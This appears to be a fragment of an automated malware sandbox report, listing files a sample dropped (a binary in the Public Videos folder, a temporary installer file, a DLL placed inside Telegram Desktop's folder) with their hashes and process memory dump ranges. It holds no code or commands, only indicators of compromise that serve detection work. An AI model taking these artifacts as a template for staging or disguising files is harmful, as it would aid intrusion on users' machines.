SHA512 c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630

memory/1580-70-0x0000023494020000-0x0000023494042000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h1zfqu1i.rz5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Public\Videos\bin.exe

MD5 06eaa3263801f4d695c3727834ffbca5
SHA1 58031db0039cf00a1fe738e55ee2fca35558c4fd
SHA256 97969d6e01ee37a16f4f7f64e6166f169bedfe95190f48d426693d4b95e8e8ff
SHA512 7b03899c6ce403172eb6d159e142b8ac25ef3aa6eb7f56abd205657d13832eb5b8ee61408b8d7a6f3f1c57de7fcc2565ce2ce9ecb4e54611f4c48098a870b6b3

memory/4084-86-0x00000000002E0000-0x00000000003B8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp

MD5 2e90747fe82d7271fbe97ea022fd5173
SHA1 6164bc0ec0c908e9159a0c5d558945d7974e11c1
SHA256 bbec6b26c13b8ebfd01789a8248c6a45646134daf1ef998dbb885ec59157e6b4
SHA512 d9a797861f8a7fc966a0a00e1719734a23c95c39aca9d70322d09274119267c8bd0d86a3ec468a7f493422769f89a48469f1e33a6a1dd2d39cb30cfb4df6fa44

memory/4084-93-0x00000000002E0000-0x00000000003B8000-memory.dmp

memory/1712-94-0x0000000000150000-0x0000000000487000-memory.dmp

memory/1712-96-0x0000000000150000-0x0000000000487000-memory.dmp

memory/1712-105-0x0000000000150000-0x0000000000487000-memory.dmp

C:\Users\Admin\AppData\Roaming\Telegram Desktop\modules\x64\d3d\d3dcompiler_47.dll

MD5 a7349236212b0e5cec2978f2cfa49a1a
SHA1 5abb08949162fd1985b89ffad40aaf5fc769017e
SHA256 a05d04a270f68c8c6d6ea2d23bebf8cd1d5453b26b5442fa54965f90f1c62082
SHA512 c7ff4f9146fefedc199360aa04236294349c881b3865ebc58c5646ad6b3f83fca309de1173f5ebf823a14ba65e5ada77b46f20286d1ea62c37e17adbc9a82d02

memory/1712-126-0x0000000000150000-0x0000000000487000-memory.dmp

memory/4084-127-0x00000000002E0000-0x00000000003B8000-memory.dmp